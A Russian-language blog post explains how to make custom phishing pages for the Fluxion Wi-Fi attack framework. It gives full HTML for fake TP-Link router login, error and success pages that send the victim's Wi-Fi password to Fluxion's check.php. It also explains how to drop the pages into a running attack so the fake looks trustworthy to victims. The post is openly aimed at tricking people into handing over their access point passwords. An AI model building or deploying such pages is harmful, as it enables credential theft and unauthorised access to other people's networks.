Создаем фейковый проект для fluxion
Life-HackДоброго времени суток. Хочу вам рассказать как можно создать свой фейковый проект для fluxion. Я использую форк проекта https://github.com/wi-fi-analyzer/fluxion так как считаю его наиболее стабильным. Когда будет свободное время хочу его переписать или на его основе сделать похожий софт но который будет отвечать моим потребностям. Если руки все таки дойдут то поделюсь с вами.
Для создание своего проекта вам понадобиться знания в html, css. Основы вы сможете подтянуть тут, данного курса вам будет более чем достаточно.
Если у вас возник вопрос зачем это вообще надо я вам сразу дам на него ответ. Дело в том что те проекты которые есть в fluxion по умолчанию не представляют для нас никакой ценности так как их внешний вид устарел или вообще не подходит для стран СНГ что сразу отпугивает жертву и вызывает недоверие что соответственно снижает наши шансы на получения пароля от точки доступа. Надеюсь с этим разобрались.
И так приступим:
Все проекты должны быть связаны с скриптом верификации fluxion check.php это требуется для валидации введенного пароля. Данный файл генерируется автоматически когда мы выбираем интерфейс. Это значит что проект не может содержать файла с именами check.php так как они будут перезаписаны.
Данный форк Fluxion поддерживает только статическую html страницу с перенаправление на файл верификации. У 3 версии есть поддержка динамических страниц но он больше тупит и по этому он мня бесит) Хотя при желании можно сделать что бы данный форк тоже поддерживал ajax запросы.
Требование к статическому типу проекта:
- index.htm - эта страница отображается когда пользователь в первый раз редиректит на наш фейк. index.htm должен содержать форму с редиректом на check.php.
- error.html - данная страница отображается если жертва ввела невалидный пароль. error.html должен содержать форму с редиректом на check.php.
- final.html - эта страница отображается, когда пользователь вводит правильный пароль.
Скрипты верификатора check.php ожидает отправки запроса с полем пароля через post запрос. Ниже указан принимаемый параметра для валидации check.php.
Допустимый POST параметр: kay1 - в данном параметре будет передаваться наш пароль.
Как только пароль будет проверен скриптом check.php сценарий перенаправит пользователя на страницу error.html или final.html в зависимости от результат.
Приступим к практике:
Для начало создами index.htm (.htm - я не опечатался именно так и должно быть). Для того чтобы не было лишних проблем можно создать два файла один с расширением htm а второй с html и наполнить их одинаковым содержимым. После того как создали файл накидаем html форму - в примере я сделаю простой макет а вы уже в свою очередь сможете потратить больше времени и скопировать внешний вид админки роутера так чтобы она внушала доверия.
HTML:
<html>
<title>TP-Link | TL-WN722N | Login</title>
<style>
.logo {
text-align: center;
}
.logo img {
width: 200px;
}
.mass {
text-align: center;
margin: 10px 0;
}
.form {
text-align: center;
}
</style>
<body>
<div class="logo">
<img src="img/logo.jpg">
</div>
<div class="mass">
Enter the password from your access point
</div>
<div class="form">
<form method="POST" action="check.php">
<input type="password" name="key1" placeholder="password wifi">
<button type="submit" name="send">ok</button>
</form>
</div>
</body>
</html>
Затем создаем файл error.html. Добавим туда тоже самое только прибавим к нашей верстке еще сообщение об ошибке.
HTML:
<html>
<title>TP-Link | TL-WN722N | Login</title>
<style>
.logo {
text-align: center;
}
.logo img {
width: 200px;
}
.mass {
text-align: center;
margin: 10px 0;
}
.form {
text-align: center;
}
.warning {
text-align: center;
color: red;
}
</style>
<body>
<div class="logo">
<img src="img/logo.jpg">
</div>
<div class="mass">
Enter the password from your access point
</div>
<div class="form">
<form method="POST" action="check.php">
<input type="password" name="key1" placeholder="password wifi">
<button type="submit" name="send">ok</button>
</form>
</div>
<div class="warning">
The password you entered is incorrect!
</div>
</body>
</html>
Осталось создать последний файл final.html. Сюда мы добавим сообщения о успешной авторизации.
HTML:
<html>
<title>TP-Link | TL-WN722N | Login</title>
<style>
.logo {
text-align: center;
}
.logo img {
width: 200px;
}
.mass {
text-align: center;
margin: 10px 0;
color: green;
}
</style>
<body>
<div class="logo">
<img src="img/logo.jpg">
</div>
<div class="mass">
Autoization was successful!
</div>
</body>
</html>
Результат работы в скриншотах
Index.html
error.html
final.html
Ну вот и все осталось добавить проект в fluxion. Так как каждый раз вносить в код изменение довольно не удобно мы будем заливать данные на ходу. Запускаем fluxion ловим рукопожатие переходим к выбору интерфейса выбираем вариант под номером 6 хотя это не принципиально и затем идем в директорию /tmp/TMPflux/data. В данном разделе заменяем имеющийся там файлы на свои. Теперь можем зайти на подставную точку и проверить результат нашей работы. Что бы делать меньше движений по заливу можно накидать не большой shell скрипт который в дальнейшем будет делать это за вас)
Если вы не имеете понятия что такое fluxion то ознакомьтесь с данным фреймворком можно тут. Надеюсь данная статья была для вас полезна и вы для себя узнали что то новое. К слову, данного материала не должно был быть опубликован - но когда я писал первую статью оказалось что нет не где реализации данного метода в текстовом виде что бы прикрепить к первой статье и по этому пришлось с начало написать эту ;) Источник